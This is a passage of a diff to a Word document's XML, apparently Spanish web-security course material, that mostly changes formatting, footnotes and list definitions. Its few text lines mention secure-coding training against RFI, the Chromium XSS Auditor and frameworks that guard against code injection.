-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Formar a los desarrolladores en prácticas de codificación segura y concienciarlos sobre los riesgos de RFI</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId25"/>
-      <w:footerReference w:type="default" r:id="rId26"/>
+      <w:headerReference w:type="default" r:id="rId26"/>
+      <w:footerReference w:type="default" r:id="rId27"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1701" w:bottom="1417" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
       <w:cols w:space="708"/>
@@ -7878,29 +7535,71 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Textonotapie"/>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Refdenotaalpie"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
         </w:rPr>
         <w:footnoteRef/>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:hyperlink r:id="rId3" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hipervnculo"/>
+            <w:sz w:val="16"/>
+            <w:szCs w:val="16"/>
           </w:rPr>
           <w:t>https://www.chromium.org/developers/design-documents/xss-auditor/</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
+  </w:footnote>
+  <w:footnote w:id="4">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Textonotapie"/>
-      </w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Refdenotaalpie"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:footnoteRef/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hscoswrapper"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>conjunto de herramientas predefinidas que proporciona una base para la construcción de aplicaciones web, disminuyendo los intentos de “ensayo-error” para comprobar el funcionamiento del código, permitiendo que estos no se repitan, y concretamente en materia de seguridad, incorporan mecanismos de protección contra las inyecciones de código malicioso.</w:t>
+      </w:r>
     </w:p>
   </w:footnote>
 </w:footnotes>
@@ -7939,7 +7638,15 @@
         <w:sz w:val="20"/>
         <w:szCs w:val="20"/>
       </w:rPr>
-      <w:t xml:space="preserve">      U1_S7</w:t>
+      <w:t xml:space="preserve">      U1_S</w:t>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        <w:sz w:val="20"/>
+        <w:szCs w:val="20"/>
+      </w:rPr>
+      <w:t>8</w:t>
     </w:r>
   </w:p>
 </w:hdr>
@@ -7968,7 +7675,7 @@
         <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
         <o:lock v:ext="edit" aspectratio="t"/>
       </v:shapetype>
-      <v:shape id="_x0000_i1132" type="#_x0000_t75" style="width:11.25pt;height:11.25pt" o:bullet="t">
+      <v:shape id="_x0000_i1029" type="#_x0000_t75" style="width:11.25pt;height:11.25pt" o:bullet="t">
         <v:imagedata r:id="rId1" o:title="msoAA7A"/>
       </v:shape>
     </w:pict>
@@ -8787,6 +8494,232 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="193F3BDF"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="1D1AE602"/>
+    <w:lvl w:ilvl="0" w:tplc="0C0A0001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0C0A0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0C0A0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6840" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="19BE3E08"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="F8A8CE1A"/>
+    <w:lvl w:ilvl="0" w:tplc="0C0A000B">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0C0A0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0C0A0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1D4643AB"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7478C10A"/>
@@ -8899,7 +8832,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1E316228"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="CF2EB514"/>
@@ -9015,7 +8948,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="241C0589"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="CF2EB514"/>
@@ -9131,7 +9064,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2BC13822"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="79CAB808"/>
@@ -9244,7 +9177,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2DBC5247"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8A126932"/>
@@ -9357,7 +9290,120 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="2E064BF5"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="042EBBD6"/>
+    <w:lvl w:ilvl="0" w:tplc="0C0A0005">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0C0A0005">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0C0A0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0C0A0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="30056038"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="2F4CDFD6"/>
@@ -9470,7 +9516,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="33A207A1"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="A874E890"/>
@@ -9587,7 +9633,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="33E212A6"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="CF2EB514"/>
@@ -9703,7 +9749,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="345D2247"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6388B3A6"/>
@@ -9789,7 +9835,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="35AF3A86"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="CDB07D9A"/>
@@ -9902,7 +9948,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="36836E00"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="87A68E64"/>
@@ -10051,7 +10097,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3C107CB1"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="DF7637BA"/>
@@ -10164,7 +10210,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3C7B7CA6"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="883E2334"/>
@@ -10313,7 +10359,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3D1A5DF6"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="C6C4F5BA"/>
@@ -10462,7 +10508,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3FB6732F"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="61964CA0"/>
@@ -10611,7 +10657,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="42ED477A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="9E467FE2"/>
@@ -10724,7 +10770,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="45FD4EBD"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="DC22A330"/>
@@ -10873,7 +10919,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4B4152A6"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="D82A6040"/>
@@ -10986,7 +11032,120 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="4E874ACC"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="4B5EACEE"/>
+    <w:lvl w:ilvl="0" w:tplc="0C0A0009">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0C0A0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0C0A0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6840" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="50B02ED0"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4A88D416"/>
@@ -11099,7 +11258,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="535D5A2D"/>
